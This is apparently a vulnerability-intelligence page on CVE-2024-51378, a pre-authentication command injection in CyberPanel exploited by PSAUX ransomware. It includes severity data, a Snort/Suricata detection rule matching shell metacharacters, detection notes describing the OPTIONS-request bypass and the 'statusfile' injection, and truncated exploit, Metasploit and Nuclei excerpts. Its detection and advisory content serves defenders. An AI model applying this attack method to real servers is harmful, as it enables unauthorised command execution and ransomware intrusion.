CVE-2024-51378
published 2024-10-29CVE-2024-51378: getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-12-25
Exploited in the wild
EPSS
94.88%
99.9th percentile
getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyberpanel | cyberpanel | < 2.3.8 | 2.3.8 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)"; flow:established,to_server; http.uri; pcre:"/^\x2f(?:dns|ftp)/"; content:"/getresetstatus"; fast_pattern; endswith; http.request_body; content:"|22|statusfile|22 3a|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,attacke.rs/posts/cyberpanel-command-injection-vulnerability/; reference:cve,2024-51378; classtype:attempted-admin; sid:2059721; rev:1; metadata:affected_product CyberPanel, attack_target Web_Server, tls_state TLSDecrypt, created_at 2025_01_28, cve CVE_2024_51378, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_01_28, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
regex: uid=[0-9]+.*gid=[0-9]+.* AND requestStatus":
- →Exploit bypasses secMiddleware (which only validates POST requests) by sending an OPTIONS HTTP request to /ftp/getresetstatus or /dns/getresetstatus with shell metacharacters in the 'statusfile' JSON body parameter. ↗
- →Detect OPTIONS method requests to URIs ending in /getresetstatus under /dns/ or /ftp/ paths — this is the auth-bypass vector; POST to these endpoints is blocked by middleware but OPTIONS is not.
- →Inspect HTTP request body for the 'statusfile' key containing shell metacharacters: semicolon (;/%3B), newline (\n/%0A), backtick (`/%60), pipe (|/%7C), or dollar sign ($/%24).
- →Attacker first performs a GET / to harvest the csrftoken cookie, then replays it in the X-CSRFToken header of the OPTIONS exploit request. Correlate a GET / followed immediately by an OPTIONS to /ftp/getresetstatus or /dns/getresetstatus from the same source IP.
- →Successful exploitation returns a JSON response containing the 'requestStatus' key with command output (e.g., uid=/gid= strings). Alert on 200 responses to these endpoints containing 'requestStatus' in the body.
- →Threat actor PSAUX ransomware group exploited this vulnerability at scale against over 22,000 CyberPanel instances in October 2024. Prioritize detection on internet-facing CyberPanel hosts (Shodan: html:"CyberPanel"). ↗
- ·Versions through 2.3.6 and the unpatched 2.3.7 release are affected. The fix is present starting from commit 1c0c6cb. Verify the installed commit hash, not just the version number, as 2.3.7 shipped both patched and unpatched builds. ↗
- ·The Snort/ET rule (sid:2059721) requires TLS decryption (tls_state TLSDecrypt) to fire on HTTPS-protected CyberPanel instances; ensure your sensor is positioned to inspect decrypted traffic.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
CyberPanel Incorrect Default Permissions Vulnerability
cisa·2024-12-04·CVSS 9.8
CVE-2024-51378 [CRITICAL] CWE-276 CyberPanel Incorrect Default Permissions Vulnerability
Vulnerability: CyberPanel Incorrect Default Permissions Vulnerability
Affected: CyberPersons CyberPanel
CyberPanel contains an incorrect default permissions vulnerability that allows for authentication bypass and the execution of arbitrary commands using shell metacharacters in the statusfile property.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://cyberpanel.net/KnowledgeBase/home/change-logs/ ; https://nvd.nist.gov/vuln/detail/CVE-2024-51378
Remediation Due Date: 2024-12-25
GHSA
GHSA-c45f-33wq-x2qc: getresetstatus in dns/views
ghsa_unreviewed·2024-10-30
CVE-2024-51378 [CRITICAL] CWE-276 GHSA-c45f-33wq-x2qc: getresetstatus in dns/views
getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
VulnCheck
CyberPanel Incorrect Default Permissions Vulnerability
vulncheck·2024·CVSS 10.0
CVE-2024-51378 [CRITICAL] CWE-276 CyberPanel Incorrect Default Permissions Vulnerability
CyberPanel Incorrect Default Permissions Vulnerability
CyberPanel contains an incorrect default permissions vulnerability that allows for authentication bypass and the execution of arbitrary commands using shell metacharacters in the statusfile property.
Affected: CyberPersons CyberPanel
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://censys.com/cve-2024-51378/; https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882; https://nvd.nist.gov/vuln/detail/CVE-2024-51378; https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/; https://www.cve.org/CVERecord?id=CVE-2024-51378; ht
Suricata
ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)
suricata·2025-01-28·CVSS 10.0
CVE-2024-51378 [CRITICAL] ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)
ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS CyberPanel getresetstatus statusfile Parameter Command Injection Attempt (CVE-2024-51378)"; flow:established,to_server; http.uri; pcre:"/^\x2f(?:dns|ftp)/"; content:"/getresetstatus"; fast_pattern; endswith; http.request_body; content:"|22|statusfile|22 3a|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,attacke.rs/posts/cyberpanel-command-injection-vulnerability/; reference:cve,2024-51378; classtype:attempted-admin; sid:2059721; rev:1; metadata:affected_product CyberPanel, attack_target Web_Server, tls_state TLSDecrypt, created_at 2025_01_28, c
Exploit-DB
CyberPanel 2.3.6 - Remote Code Execution (RCE)
exploitdb·2025-04-11·CVSS 10.0
CVE-2024-51378 [CRITICAL] CyberPanel 2.3.6 - Remote Code Execution (RCE)
CyberPanel 2.3.6 - Remote Code Execution (RCE)
---
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/
#!/usr/bin/python3
import argparse
import httpx
import sys
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"
print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execut
Metasploit
CyberPanel Multi CVE Pre-auth RCE
metasploit·CVSS 9.8
CVE-2024-51567 [CRITICAL] CyberPanel Multi CVE Pre-auth RCE
CyberPanel Multi CVE Pre-auth RCE
This module exploits three separate unauthenticated Remote Code Execution vulnerabilities in CyberPanel: - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint. - CVE-2024-51568: Command Injection via the "completePath" parameter in the "outputExecutioner" sink. - CVE-2024-51378: Unauthenticated RCE in "/ftp/getresetstatus" and "/dns/getresetstatus". These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.
Nuclei
CyberPanel - Command Injection
nuclei·CVSS 9.8
CVE-2024-51378 [CRITICAL] CyberPanel - Command Injection
CyberPanel - Command Injection
CyberPanel contains a command injection vulnerability in the /ftp/getresetstatus and /dns/getresetstatus endpoints.The vulnerability exists due to improper validation of the 'statusfile' parameter, which is directly used in a shell command.The security middleware only validates POST requests, allowing attackers to bypass protection using OPTIONS requests.
Template:
id: CVE-2024-51378
info:
name: CyberPanel - Command Injection
author: ritikchaddha
severity: critical
description: |
CyberPanel contains a command injection vulnerability in the /ftp/getresetstatus and /dns/getresetstatus endpoints.The vulnerability exists due to improper validation of the 'statusfile' parameter, which is directly used in a shell command.The security middleware only validates P
Trendmicro
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
blogs_trendmicro·2025-05-27
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
APT & Targeted Attacks
# Earth Lamia Develops Custom Arsenal to Target Multiple Industries
Trend™ Research has been tracking an active APT threat actor named Earth Lamia, targeting multiple industries in Brazil, India and Southeast Asia countries at least since 2023. The threat actor primarily exploits vulnerabilities in web applications to gain access to targeted organizations.
By: Joseph C Chen
2025/05/27
Read time: ( words)
Save to Folio
Summary
- Trend Research has identified Earth Lamia as an APT threat actor that exploits vulnerabilities in web applications to gain access to organizations, using various techniques for data exfiltration.
- Earth Lamia develops and customizes hacking tools to evade detection, such as PULSEPACK and BypassBoss.
- Earth Lamia has primarily targeted
Greynoiseio
NoiseLetter November 2024
blogs_greynoiseio
NoiseLetter November 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://cwe.mitre.org/data/definitions/420.htmlhttps://cwe.mitre.org/data/definitions/78.htmlhttps://cyberpanel.net/KnowledgeBase/home/change-logs/https://cyberpanel.net/blog/detials-and-fix-of-recent-security-issue-and-patch-of-cyberpanelhttps://github.com/usmannasir/cyberpanel/commit/1c0c6cbcf71abe573da0b5fddfb9603e7477f683https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-51378
2024-10-29
Published
2024-12-04
Added to CISA KEV
Exploited in the wild